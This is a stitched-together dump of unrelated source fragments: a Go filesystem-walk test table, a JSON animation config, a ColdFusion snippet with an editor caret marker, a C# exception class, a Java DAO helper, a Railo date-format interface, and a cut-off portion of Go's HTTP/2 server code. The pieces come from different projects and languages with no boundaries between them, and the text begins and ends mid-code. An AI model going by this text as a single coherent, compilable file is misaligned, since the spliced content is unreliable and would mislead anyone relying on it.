"/a",
infiniteDepth,
nil,
[]string{
"/a",
"/a/b",
"/a/b/c",
"/a/d",
},
}, {
"depth 1 walk from root",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
"/",
1,
nil,
[]string{
"/",
"/a",
"/e",
"/f",
},
}, {
"depth 1 walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
},
"/a/b",
1,
nil,
[]string{
"/a/b",
"/a/b/c",
"/a/b/g",
},
}, {
"depth 0 walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
},
"/a/b",
0,
nil,
[]string{
"/a/b",
},
}, {
"infinite walk from file",
[]string{
"mkdir /a",
"touch /a/b",
"touch /a/c",
},
"/a/b",
0,
nil,
[]string{
"/a/b",
},
}, {
"infinite walk with skipped subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
"touch /a/b/z",
},
"/",
infiniteDepth,
func(path string, info os.FileInfo, err error) error {
if path == "/a/b/g" {
return filepath.SkipDir
}
return nil
},
[]string{
"/",
"/a",
"/a/b",
"/a/b/c",
"/a/b/z",
},
}}
ctx := context.Background()
for _, tc := range testCases {
fs, err := buildTestFS(tc.buildfs)
if err != nil {
t.Fatalf("%s: cannot create test filesystem: %v", tc.desc, err)
}
var got []string
traceFn := func(path string, info os.FileInfo, err error) error {
if tc.walkFn != nil {
err = tc.walkFn(path, info, err)
if err != nil {
return err
}
}
got = append(got, path)
return nil
}
fi, err := fs.Stat(ctx, tc.startAt)
if err != nil {
t.Fatalf("%s: cannot stat: %v", tc.desc, err)
}
err = walkFS(ctx, fs, tc.depth, tc.startAt, fi, traceFn)
if err != nil {
t.Errorf("%s:\ngot error %v, want nil", tc.desc, err)
continue
}
sort.Strings(got)
sort.Strings(tc.want)
if !reflect.DeepEqual(got, tc.want) {
t.Errorf("%s:\ngot %q\nwant %q", tc.desc, got, tc.want)
continue
}
}
}
func buildTestFS(buildfs []string) (FileSystem, error) {
// TODO: Could this be merged with the build logic in TestFS?
ctx := context.Background()
fs := NewMemFS()
for _, b := range buildfs {
op := strings.Split(b, " ")
switch op[0] {
case "mkdir":
err := fs.Mkdir(ctx, op[1], os.ModeDir|0777)
if err != nil {
return nil, err
}
case "touch":
f, err := fs.OpenFile(ctx, op[1], os.O_RDWR|os.O_CREATE, 0666)
if err != nil {
return nil, err
}
f.Close()
case "write":
f, err := fs.OpenFile(ctx, op[1], os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
return nil, err
}
_, err = f.Write([]byte(op[2]))
f.Close()
if err != nil {
return nil, err
}
default:
return nil, fmt.Errorf("unknown file operation %q", op[0])
}
}
return fs, nil
}
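// exampleBuildTestFS is an added, hypothetical sketch (not part of the
// original tests) showing how buildTestFS's tiny "op path [content]"
// language composes. Note that strings.Split on " " means a "write"
// payload cannot itself contain spaces.
func exampleBuildTestFS() (FileSystem, error) {
	return buildTestFS([]string{
		"mkdir /a",         // create a directory
		"touch /a/b",       // create an empty file
		"write /a/b hello", // truncate /a/b and write the payload "hello"
	})
}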
{
"animation":{
"frametime":2
}
}
<cfset variable = 10>
<cfset variable = variable + 10>
<cfscript>
vari<caret>able = 4;
</cfscript>
namespace System.ServiceModel
{
/// <summary>
/// Represents a communication error in either the service or client application.
/// </summary>
public partial class CommunicationException : SystemException
{
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class.
/// </summary>
public CommunicationException()
{ }
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class, using the specified message.
/// </summary>
/// <param name="message">The description of the error condition.</param>
public CommunicationException(string message) : base(message)
{ }
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class, using the specified message and the inner exception.
/// </summary>
/// <param name="message">The description of the error condition.</param>
/// <param name="innerException">The inner exception to be used.</param>
public CommunicationException(string message, Exception innerException) : base(message, innerException)
{ }
}
}
/*
* Copyright 2015 herd contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.finra.herd.service.helper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import org.finra.herd.dao.StoragePolicyTransitionTypeDao;
import org.finra.herd.model.ObjectNotFoundException;
import org.finra.herd.model.jpa.StoragePolicyTransitionTypeEntity;
/**
 * Helper for storage policy transition type related operations that require DAO access.
*/
@Component
public class StoragePolicyTransitionTypeDaoHelper
{
@Autowired
private StoragePolicyTransitionTypeDao storagePolicyTransitionTypeDao;
/**
* Gets the storage policy transition type entity and ensure it exists.
*
* @param code the storage policy transition type code (case insensitive)
*
* @return the storage policy transition type entity
* @throws org.finra.herd.model.ObjectNotFoundException if the entity doesn't exist
*/
public StoragePolicyTransitionTypeEntity getStoragePolicyTransitionTypeEntity(String code) throws ObjectNotFoundException
{
StoragePolicyTransitionTypeEntity storagePolicyTransitionTypeEntity = storagePolicyTransitionTypeDao.getStoragePolicyTransitionTypeByCode(code);
if (storagePolicyTransitionTypeEntity == null)
{
throw new ObjectNotFoundException(String.format("Storage policy transition type with code \"%s\" doesn't exist.", code));
}
return storagePolicyTransitionTypeEntity;
}
}
package railo.runtime.format;
import java.util.Date;
/**
*
*/
public interface Format {
/**
* formats a date to a cfml date format (short)
* @param date
	 * @return formatted String
*/
public abstract String format(Date date);
/**
* formats a date to a cfml date format
* @param date
* @param mask
	 * @return formatted string
*/
public abstract String format(Date date, String mask);
}
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// TODO: turn off the serve goroutine when idle, so
// an idle conn only has the readFrames goroutine active. (which could
// also be optimized probably to pin less memory in crypto/tls). This
// would involve tracking when the serve goroutine is active (atomic
// int32 read/CAS probably?) and starting it up when frames arrive,
// and shutting it down when all handlers exit. the occasional PING
// packets could use time.AfterFunc to call sc.wakeStartServeLoop()
// (which is a no-op if already running) and then queue the PING write
// as normal. The serve loop would then exit in most cases (if no
// Handlers running) and not be woken up again until the PING packet
// returns.
// TODO (maybe): add a mechanism for Handlers to going into
// half-closed-local mode (rw.(io.Closer) test?) but not exit their
// handler, and continue to be able to read from the
// Request.Body. This would be a somewhat semantic change from HTTP/1
// (or at least what we expose in net/http), so I'd probably want to
// add it there too. For now, this package says that returning from
// the Handler ServeHTTP function means you're both done reading and
// done writing, without a way to stop just one or the other.
package http2
import (
"bufio"
"bytes"
"crypto/tls"
"errors"
"fmt"
"io"
"log"
"math"
"net"
"net/http"
"net/textproto"
"net/url"
"os"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"time"
"golang.org/x/net/http2/hpack"
)
const (
prefaceTimeout = 10 * time.Second
firstSettingsTimeout = 2 * time.Second // should be in-flight with preface anyway
handlerChunkWriteSize = 4 << 10
defaultMaxStreams = 250 // TODO: make this 100 as the GFE seems to?
)
var (
errClientDisconnected = errors.New("client disconnected")
errClosedBody = errors.New("body closed by handler")
errHandlerComplete = errors.New("http2: request body closed due to handler exiting")
errStreamClosed = errors.New("http2: stream closed")
)
var responseWriterStatePool = sync.Pool{
New: func() interface{} {
rws := &responseWriterState{}
rws.bw = bufio.NewWriterSize(chunkWriter{rws}, handlerChunkWriteSize)
return rws
},
}
// Test hooks.
var (
testHookOnConn func()
testHookGetServerConn func(*serverConn)
testHookOnPanicMu *sync.Mutex // nil except in tests
testHookOnPanic func(sc *serverConn, panicVal interface{}) (rePanic bool)
)
// Server is an HTTP/2 server.
type Server struct {
// MaxHandlers limits the number of http.Handler ServeHTTP goroutines
// which may run at a time over all connections.
	// Negative or zero means no limit.
// TODO: implement
MaxHandlers int
// MaxConcurrentStreams optionally specifies the number of
// concurrent streams that each client may have open at a
// time. This is unrelated to the number of http.Handler goroutines
// which may be active globally, which is MaxHandlers.
// If zero, MaxConcurrentStreams defaults to at least 100, per
// the HTTP/2 spec's recommendations.
MaxConcurrentStreams uint32
// MaxReadFrameSize optionally specifies the largest frame
// this server is willing to read. A valid value is between
// 16k and 16M, inclusive. If zero or otherwise invalid, a
// default value is used.
MaxReadFrameSize uint32
// PermitProhibitedCipherSuites, if true, permits the use of
// cipher suites prohibited by the HTTP/2 spec.
PermitProhibitedCipherSuites bool
// IdleTimeout specifies how long until idle clients should be
// closed with a GOAWAY frame. PING frames are not considered
// activity for the purposes of IdleTimeout.
IdleTimeout time.Duration
// MaxUploadBufferPerConnection is the size of the initial flow
	// control window for each connection. The HTTP/2 spec does not
// allow this to be smaller than 65535 or larger than 2^32-1.
// If the value is outside this range, a default value will be
// used instead.
MaxUploadBufferPerConnection int32
// MaxUploadBufferPerStream is the size of the initial flow control
// window for each stream. The HTTP/2 spec does not allow this to
// be larger than 2^32-1. If the value is zero or larger than the
// maximum, a default value will be used instead.
MaxUploadBufferPerStream int32
// NewWriteScheduler constructs a write scheduler for a connection.
// If nil, a default scheduler is chosen.
NewWriteScheduler func() WriteScheduler
// Internal state. This is a pointer (rather than embedded directly)
// so that we don't embed a Mutex in this struct, which will make the
// struct non-copyable, which might break some callers.
state *serverInternalState
}
func (s *Server) initialConnRecvWindowSize() int32 {
if s.MaxUploadBufferPerConnection > initialWindowSize {
return s.MaxUploadBufferPerConnection
}
return 1 << 20
}
func (s *Server) initialStreamRecvWindowSize() int32 {
if s.MaxUploadBufferPerStream > 0 {
return s.MaxUploadBufferPerStream
}
return 1 << 20
}
func (s *Server) maxReadFrameSize() uint32 {
if v := s.MaxReadFrameSize; v >= minMaxFrameSize && v <= maxFrameSize {
return v
}
return defaultMaxReadFrameSize
}
func (s *Server) maxConcurrentStreams() uint32 {
if v := s.MaxConcurrentStreams; v > 0 {
return v
}
return defaultMaxStreams
}
type serverInternalState struct {
mu sync.Mutex
activeConns map[*serverConn]struct{}
}
func (s *serverInternalState) registerConn(sc *serverConn) {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
s.activeConns[sc] = struct{}{}
s.mu.Unlock()
}
func (s *serverInternalState) unregisterConn(sc *serverConn) {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
delete(s.activeConns, sc)
s.mu.Unlock()
}
func (s *serverInternalState) startGracefulShutdown() {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
for sc := range s.activeConns {
sc.startGracefulShutdown()
}
s.mu.Unlock()
}
// ConfigureServer adds HTTP/2 support to a net/http Server.
//
// The configuration conf may be nil.
//
// ConfigureServer must be called before s begins serving.
func ConfigureServer(s *http.Server, conf *Server) error {
if s == nil {
panic("nil *http.Server")
}
if conf == nil {
conf = new(Server)
}
conf.state = &serverInternalState{activeConns: make(map[*serverConn]struct{})}
if err := configureServer18(s, conf); err != nil {
return err
}
if err := configureServer19(s, conf); err != nil {
return err
}
if s.TLSConfig == nil {
s.TLSConfig = new(tls.Config)
} else if s.TLSConfig.CipherSuites != nil {
// If they already provided a CipherSuite list, return
// an error if it has a bad order or is missing
// ECDHE_RSA_WITH_AES_128_GCM_SHA256.
const requiredCipher = tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
haveRequired := false
sawBad := false
for i, cs := range s.TLSConfig.CipherSuites {
if cs == requiredCipher {
haveRequired = true
}
if isBadCipher(cs) {
sawBad = true
} else if sawBad {
return fmt.Errorf("http2: TLSConfig.CipherSuites index %d contains an HTTP/2-approved cipher suite (%#04x), but it comes after unapproved cipher suites. With this configuration, clients that don't support previous, approved cipher suites may be given an unapproved one and reject the connection.", i, cs)
}
}
if !haveRequired {
return fmt.Errorf("http2: TLSConfig.CipherSuites is missing HTTP/2-required TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256")
}
}
// Note: not setting MinVersion to tls.VersionTLS12,
// as we don't want to interfere with HTTP/1.1 traffic
// on the user's server. We enforce TLS 1.2 later once
// we accept a connection. Ideally this should be done
// during next-proto selection, but using TLS <1.2 with
// HTTP/2 is still the client's bug.
s.TLSConfig.PreferServerCipherSuites = true
haveNPN := false
for _, p := range s.TLSConfig.NextProtos {
if p == NextProtoTLS {
haveNPN = true
break
}
}
if !haveNPN {
s.TLSConfig.NextProtos = append(s.TLSConfig.NextProtos, NextProtoTLS)
}
if s.TLSNextProto == nil {
s.TLSNextProto = map[string]func(*http.Server, *tls.Conn, http.Handler){}
}
protoHandler := func(hs *http.Server, c *tls.Conn, h http.Handler) {
if testHookOnConn != nil {
testHookOnConn()
}
conf.ServeConn(c, &ServeConnOpts{
Handler: h,
BaseConfig: hs,
})
}
s.TLSNextProto[NextProtoTLS] = protoHandler
return nil
}
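// configureServerExample is an added usage sketch, not part of the original
// file: it shows the typical way to enable HTTP/2 on a net/http server via
// ConfigureServer. mux, certFile, and keyFile are hypothetical caller inputs.
func configureServerExample(mux http.Handler, certFile, keyFile string) error {
	srv := &http.Server{Addr: ":443", Handler: mux}
	// A nil *Server is also accepted; defaults are then used.
	if err := ConfigureServer(srv, &Server{}); err != nil {
		return err
	}
	// TLS is required: ConfigureServer registers the "h2" ALPN protocol,
	// which is negotiated during the TLS handshake.
	return srv.ListenAndServeTLS(certFile, keyFile)
}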
// ServeConnOpts are options for the Server.ServeConn method.
type ServeConnOpts struct {
// BaseConfig optionally sets the base configuration
// for values. If nil, defaults are used.
BaseConfig *http.Server
// Handler specifies which handler to use for processing
// requests. If nil, BaseConfig.Handler is used. If BaseConfig
// or BaseConfig.Handler is nil, http.DefaultServeMux is used.
Handler http.Handler
}
func (o *ServeConnOpts) baseConfig() *http.Server {
if o != nil && o.BaseConfig != nil {
return o.BaseConfig
}
return new(http.Server)
}
func (o *ServeConnOpts) handler() http.Handler {
if o != nil {
if o.Handler != nil {
return o.Handler
}
if o.BaseConfig != nil && o.BaseConfig.Handler != nil {
return o.BaseConfig.Handler
}
}
return http.DefaultServeMux
}
// ServeConn serves HTTP/2 requests on the provided connection and
// blocks until the connection is no longer readable.
//
// ServeConn starts speaking HTTP/2 assuming that c has not had any
// reads or writes. It writes its initial settings frame and expects
// to be able to read the preface and settings frame from the
// client. If c has a ConnectionState method like a *tls.Conn, the
// ConnectionState is used to verify the TLS ciphersuite and to set
// the Request.TLS field in Handlers.
//
// ServeConn does not support h2c by itself. Any h2c support must be
// implemented in terms of providing a suitably-behaving net.Conn.
//
// The opts parameter is optional. If nil, default values are used.
func (s *Server) ServeConn(c net.Conn, opts *ServeConnOpts) {
baseCtx, cancel := serverConnBaseContext(c, opts)
defer cancel()
sc := &serverConn{
srv: s,
hs: opts.baseConfig(),
conn: c,
baseCtx: baseCtx,
remoteAddrStr: c.RemoteAddr().String(),
bw: newBufferedWriter(c),
handler: opts.handler(),
streams: make(map[uint32]*stream),
readFrameCh: make(chan readFrameResult),
wantWriteFrameCh: make(chan FrameWriteRequest, 8),
serveMsgCh: make(chan interface{}, 8),
wroteFrameCh: make(chan frameWriteResult, 1), // buffered; one send in writeFrameAsync
bodyReadCh: make(chan bodyReadMsg), // buffering doesn't matter either way
doneServing: make(chan struct{}),
clientMaxStreams: math.MaxUint32, // Section 6.5.2: "Initially, there is no limit to this value"
advMaxStreams: s.maxConcurrentStreams(),
initialStreamSendWindowSize: initialWindowSize,
maxFrameSize: initialMaxFrameSize,
headerTableSize: initialHeaderTableSize,
serveG: newGoroutineLock(),
pushEnabled: true,
}
s.state.registerConn(sc)
defer s.state.unregisterConn(sc)
// The net/http package sets the write deadline from the
// http.Server.WriteTimeout during the TLS handshake, but then
// passes the connection off to us with the deadline already set.
// Write deadlines are set per stream in serverConn.newStream.
// Disarm the net.Conn write deadline here.
if sc.hs.WriteTimeout != 0 {
sc.conn.SetWriteDeadline(time.Time{})
}
if s.NewWriteScheduler != nil {
sc.writeSched = s.NewWriteScheduler()
} else {
sc.writeSched = NewRandomWriteScheduler()
}
// These start at the RFC-specified defaults. If there is a higher
// configured value for inflow, that will be updated when we send a
// WINDOW_UPDATE shortly after sending SETTINGS.
sc.flow.add(initialWindowSize)
sc.inflow.add(initialWindowSize)
sc.hpackEncoder = hpack.NewEncoder(&sc.headerWriteBuf)
fr := NewFramer(sc.bw, c)
fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil)
fr.MaxHeaderListSize = sc.maxHeaderListSize()
fr.SetMaxReadFrameSize(s.maxReadFrameSize())
sc.framer = fr
if tc, ok := c.(connectionStater); ok {
sc.tlsState = new(tls.ConnectionState)
*sc.tlsState = tc.ConnectionState()
// 9.2 Use of TLS Features
// An implementation of HTTP/2 over TLS MUST use TLS
// 1.2 or higher with the restrictions on feature set
// and cipher suite described in this section. Due to
// implementation limitations, it might not be
// possible to fail TLS negotiation. An endpoint MUST
// immediately terminate an HTTP/2 connection that
// does not meet the TLS requirements described in
// this section with a connection error (Section
// 5.4.1) of type INADEQUATE_SECURITY.
if sc.tlsState.Version < tls.VersionTLS12 {
sc.rejectConn(ErrCodeInadequateSecurity, "TLS version too low")
return
}
if sc.tlsState.ServerName == "" {
// Client must use SNI, but we don't enforce that anymore,
// since it was causing problems when connecting to bare IP
// addresses during development.
//
// TODO: optionally enforce? Or enforce at the time we receive
			// a new request, and verify that the ServerName matches the :authority?
// But that precludes proxy situations, perhaps.
//
// So for now, do nothing here again.
}
if !s.PermitProhibitedCipherSuites && isBadCipher(sc.tlsState.CipherSuite) {
// "Endpoints MAY choose to generate a connection error
// (Section 5.4.1) of type INADEQUATE_SECURITY if one of
// the prohibited cipher suites are negotiated."
//
// We choose that. In my opinion, the spec is weak
// here. It also says both parties must support at least
			// TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, so there are no
			// excuses here. If we really must, we could allow an
// "AllowInsecureWeakCiphers" option on the server later.
// Let's see how it plays out first.
sc.rejectConn(ErrCodeInadequateSecurity, fmt.Sprintf("Prohibited TLS 1.2 Cipher Suite: %x", sc.tlsState.CipherSuite))
return
}
}
if hook := testHookGetServerConn; hook != nil {
hook(sc)
}
sc.serve()
}
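// serveConnExample is an added, hedged sketch (not part of the original
// file): it drives ServeConn directly from a listener the caller owns.
// ln is expected to yield TLS connections that negotiated "h2", per the
// ServeConn documentation above; ln and handler are hypothetical inputs.
func serveConnExample(s *Server, ln net.Listener, handler http.Handler) error {
	for {
		c, err := ln.Accept()
		if err != nil {
			return err
		}
		// ServeConn blocks until the connection is no longer readable,
		// so each connection gets its own goroutine.
		go s.ServeConn(c, &ServeConnOpts{Handler: handler})
	}
}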
func (sc *serverConn) rejectConn(err ErrCode, debug string) {
sc.vlogf("http2: server rejecting conn: %v, %s", err, debug)
// ignoring errors. hanging up anyway.
sc.framer.WriteGoAway(0, err, []byte(debug))
sc.bw.Flush()
sc.conn.Close()
}
type serverConn struct {
// Immutable:
srv *Server
hs *http.Server
conn net.Conn
bw *bufferedWriter // writing to conn
handler http.Handler
baseCtx contextContext
framer *Framer
doneServing chan struct{} // closed when serverConn.serve ends
readFrameCh chan readFrameResult // written by serverConn.readFrames
wantWriteFrameCh chan FrameWriteRequest // from handlers -> serve
wroteFrameCh chan frameWriteResult // from writeFrameAsync -> serve, tickles more frame writes
bodyReadCh chan bodyReadMsg // from handlers -> serve
serveMsgCh chan interface{} // misc messages & code to send to / run on the serve loop
flow flow // conn-wide (not stream-specific) outbound flow control
inflow flow // conn-wide inbound flow control
tlsState *tls.ConnectionState // shared by all handlers, like net/http
remoteAddrStr string
writeSched WriteScheduler
// Everything following is owned by the serve loop; use serveG.check():
serveG goroutineLock // used to verify funcs are on serve()
pushEnabled bool
sawFirstSettings bool // got the initial SETTINGS frame after the preface
needToSendSettingsAck bool
unackedSettings int // how many SETTINGS have we sent without ACKs?
clientMaxStreams uint32 // SETTINGS_MAX_CONCURRENT_STREAMS from client (our PUSH_PROMISE limit)
	advMaxStreams uint32 // our SETTINGS_MAX_CONCURRENT_STREAMS advertised to the client
curClientStreams uint32 // number of open streams initiated by the client
curPushedStreams uint32 // number of open streams initiated by server push
maxClientStreamID uint32 // max ever seen from client (odd), or 0 if there have been no client requests
maxPushPromiseID uint32 // ID of the last push promise (even), or 0 if there have been no pushes
streams map[uint32]*stream
initialStreamSendWindowSize int32
maxFrameSize int32
headerTableSize uint32
peerMaxHeaderListSize uint32 // zero means unknown (default)
canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
writingFrame bool // started writing a frame (on serve goroutine or separate)
writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
needsFrameFlush bool // last frame write wasn't a flush
inGoAway bool // we've started to or sent GOAWAY
inFrameScheduleLoop bool // whether we're in the scheduleFrameWrite loop
needToSendGoAway bool // we need to schedule a GOAWAY frame write
goAwayCode ErrCode
shutdownTimer *time.Timer // nil until used
idleTimer *time.Timer // nil if unused
// Owned by the writeFrameAsync goroutine:
headerWriteBuf bytes.Buffer
hpackEncoder *hpack.Encoder
// Used by startGracefulShutdown.
shutdownOnce sync.Once
}
func (sc *serverConn) maxHeaderListSize() uint32 {
n := sc.hs.MaxHeaderBytes
if n <= 0 {
n = http.DefaultMaxHeaderBytes
}
// http2's count is in a slightly different unit and includes 32 bytes per pair.
// So, take the net/http.Server value and pad it up a bit, assuming 10 headers.
const perFieldOverhead = 32 // per http2 spec
const typicalHeaders = 10 // conservative
return uint32(n + typicalHeaders*perFieldOverhead)
}
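// Worked example (added for illustration): with net/http's default of
// http.DefaultMaxHeaderBytes (1 << 20), the value advertised above is
// 1048576 + 10*32 = 1048896 bytes.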
func (sc *serverConn) curOpenStreams() uint32 {
sc.serveG.check()
return sc.curClientStreams + sc.curPushedStreams
}
// stream represents a stream. This is the minimal metadata needed by
// the serve goroutine. Most of the actual stream state is owned by
// the http.Handler's goroutine in the responseWriter. Because the
// responseWriter's responseWriterState is recycled at the end of a
// handler, this struct intentionally has no pointer to the
// *responseWriter{,State} itself, as the Handler ending nils out the
// responseWriter's state field.
type stream struct {
// immutable:
sc *serverConn
id uint32
body *pipe // non-nil if expecting DATA frames
cw closeWaiter // closed wait stream transitions to closed state
ctx contextContext
cancelCtx func()
// owned by serverConn's serve loop:
bodyBytes int64 // body bytes seen so far
declBodyBytes int64 // or -1 if undeclared
flow flow // limits writing from Handler to client
inflow flow // what the client is allowed to POST/etc to us
parent *stream // or nil
numTrailerValues int64
weight uint8
state streamState
resetQueued bool // RST_STREAM queued for write; set by sc.resetStream
gotTrailerHeader bool // HEADER frame for trailers was seen
wroteHeaders bool // whether we wrote headers (not status 100)
writeDeadline *time.Timer // nil if unused
trailer http.Header // accumulated trailers
reqTrailer http.Header // handler's Request.Trailer
}
func (sc *serverConn) Framer() *Framer { return sc.framer }
func (sc *serverConn) CloseConn() error { return sc.conn.Close() }
func (sc *serverConn) Flush() error { return sc.bw.Flush() }
func (sc *serverConn) HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) {
return sc.hpackEncoder, &sc.headerWriteBuf
}
func (sc *serverConn) state(streamID uint32) (streamState, *stream) {
sc.serveG.check()
// http://tools.ietf.org/html/rfc7540#section-5.1
if st, ok := sc.streams[streamID]; ok {
return st.state, st
}
// "The first use of a new stream identifier implicitly closes all
// streams in the "idle" state that might have been initiated by
// that peer with a lower-valued stream identifier. For example, if
// a client sends a HEADERS frame on stream 7 without ever sending a
// frame on stream 5, then stream 5 transitions to the "closed"
// state when the first frame for stream 7 is sent or received."
if streamID%2 == 1 {
if streamID <= sc.maxClientStreamID {
return stateClosed, nil
}
} else {
if streamID <= sc.maxPushPromiseID {
return stateClosed, nil
}
}
return stateIdle, nil
}
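// Illustration (added): if the highest client stream seen is 7
// (sc.maxClientStreamID == 7), then state(5) reports stateClosed even if
// stream 5 never carried a frame, while state(9) still reports stateIdle.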
// setConnState calls the net/http ConnState hook for this connection, if configured.
// Note that the net/http package does StateNew and StateClosed for us.
// There is currently no plan for StateHijacked or hijacking HTTP/2 connections.
func (sc *serverConn) setConnState(state http.ConnState) {
if sc.hs.ConnState != nil {
sc.hs.ConnState(sc.conn, state)
}
}
func (sc *serverConn) vlogf(format string, args ...interface{}) {
if VerboseLogs {
sc.logf(format, args...)
}
}
func (sc *serverConn) logf(format string, args ...interface{}) {
if lg := sc.hs.ErrorLog; lg != nil {
lg.Printf(format, args...)
} else {
log.Printf(format, args...)
}
}
// errno returns v's underlying uintptr, else 0.
//
// TODO: remove this helper function once http2 can use build
// tags. See comment in isClosedConnError.
func errno(v error) uintptr {
if rv := reflect.ValueOf(v); rv.Kind() == reflect.Uintptr {
return uintptr(rv.Uint())
}
return 0
}
// isClosedConnError reports whether err is an error from use of a closed
// network connection.
func isClosedConnError(err error) bool {
if err == nil {
return false
}
// TODO: remove this string search and be more like the Windows
// case below. That might involve modifying the standard library
// to return better error types.
str := err.Error()
if strings.Contains(str, "use of closed network connection") {
return true
}
// TODO(bradfitz): x/tools/cmd/bundle doesn't really support
// build tags, so I can't make an http2_windows.go file with
// Windows-specific stuff. Fix that and move this, once we
// have a way to bundle this into std's net/http somehow.
if runtime.GOOS == "windows" {
if oe, ok := err.(*net.OpError); ok && oe.Op == "read" {
if se, ok := oe.Err.(*os.SyscallError); ok && se.Syscall == "wsarecv" {
const WSAECONNABORTED = 10053
const WSAECONNRESET = 10054
if n := errno(se.Err); n == WSAECONNRESET || n == WSAECONNABORTED {
return true
}
}
}
}
return false
}
func (sc *serverConn) condlogf(err error, format string, args ...interface{}) {
if err == nil {
return
}
if err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) {
// Boring, expected errors.
sc.vlogf(format, args...)
} else {
sc.logf(format, args...)
}
}
func (sc *serverConn) canonicalHeader(v string) string {
sc.serveG.check()
cv, ok := commonCanonHeader[v]
if ok {
return cv
}
cv, ok = sc.canonHeader[v]
if ok {
return cv
}
if sc.canonHeader == nil {
sc.canonHeader = make(map[string]string)
}
cv = http.CanonicalHeaderKey(v)
sc.canonHeader[v] = cv
return cv
}
type readFrameResult struct {
f Frame // valid until readMore is called
err error
// readMore should be called once the consumer no longer needs or
// retains f. After readMore, f is invalid and more frames can be
// read.
readMore func()
}
// readFrames is the loop that reads incoming frames.
// It takes care to only read one frame at a time, blocking until the
// consumer is done with the frame.
// It's run on its own goroutine.
func (sc *serverConn) readFrames() {
gate := make(gate)
gateDone := gate.Done
for {
f, err := sc.framer.ReadFrame()
select {
case sc.readFrameCh <- readFrameResult{f, err, gateDone}:
case <-sc.doneServing:
return
}
select {
case <-gate:
case <-sc.doneServing:
return
}
if terminalReadFrameError(err) {
return
}
}
}
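// The gate above is a one-slot handshake: readFrames parks after handing a
// frame to the serve loop and resumes only when the consumer calls readMore
// (gate.Done). A minimal sketch of the pattern, assuming the package's gate
// is the usual channel form defined elsewhere:
//
//	type gate chan struct{}
//
//	func (g gate) Done() { g <- struct{}{} }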
// frameWriteResult is the message passed from writeFrameAsync to the serve goroutine.
type frameWriteResult struct {
wr FrameWriteRequest // what was written (or attempted)
err error // result of the writeFrame call
}
// writeFrameAsync runs in its own goroutine and writes a single frame
// and then reports when it's done.
// At most one goroutine can be running writeFrameAsync at a time per
// serverConn.
func (sc *serverConn) writeFrameAsync(wr FrameWriteRequest) {
err := wr.write.writeFrame(sc)
sc.wroteFrameCh <- frameWriteResult{wr, err}
}
func (sc *serverConn) closeAllStreamsOnConnClose() {
sc.serveG.check()
for _, st := range sc.streams {
sc.closeStream(st, errClientDisconnected)
}
}
func (sc *serverConn) stopShutdownTimer() {
sc.serveG.check()
if t := sc.shutdownTimer; t != nil {
t.Stop()
}
}
func (sc *serverConn) notePanic() {
// Note: this is for serverConn.serve panicking, not http.Handler code.
if testHookOnPanicMu != nil {
testHookOnPanicMu.Lock()
defer testHookOnPanicMu.Unlock()
}
if testHookOnPanic != nil {
if e := recover(); e != nil {
if testHookOnPanic(sc, e) {
panic(e)
}
}
}
}
func (sc *serverConn) serve() {
sc.serveG.check()
defer sc.notePanic()
defer sc.conn.Close()
defer sc.closeAllStreamsOnConnClose()
defer sc.stopShutdownTimer()
defer close(sc.doneServing) // unblocks handlers trying to send
if VerboseLogs {
sc.vlogf("http2: server connection from %v on %p", sc.conn.RemoteAddr(), sc.hs)
}
sc.writeFrame(FrameWriteRequest{
write: writeSettings{
{SettingMaxFrameSize, sc.srv.maxReadFrameSize()},
{SettingMaxConcurrentStreams, sc.advMaxStreams},
{SettingMaxHeaderListSize, sc.maxHeaderListSize()},
{SettingInitialWindowSize, uint32(sc.srv.initialStreamRecvWindowSize())},
},
})
sc.unackedSettings++
	// Each connection starts with initialWindowSize inflow tokens.
// If a higher value is configured, we add more tokens.
if diff := sc.srv.initialConnRecvWindowSize() - initialWindowSize; diff > 0 {
sc.sendWindowUpdate(nil, int(diff))
}
if err := sc.readPreface(); err != nil {
sc.condlogf(err, "http2: server: error reading preface from client %v: %v", sc.conn.RemoteAddr(), err)
return
}
// Now that we've got the preface, get us out of the
// "StateNew" state. We can't go directly to idle, though.
// Active means we read some data and anticipate a request. We'll
// do another Active when we get a HEADERS frame.
sc.setConnState(http.StateActive)
sc.setConnState(http.StateIdle)
if sc.srv.IdleTimeout != 0 {
sc.idleTimer = time.AfterFunc(sc.srv.IdleTimeout, sc.onIdleTimer)
defer sc.idleTimer.Stop()
}
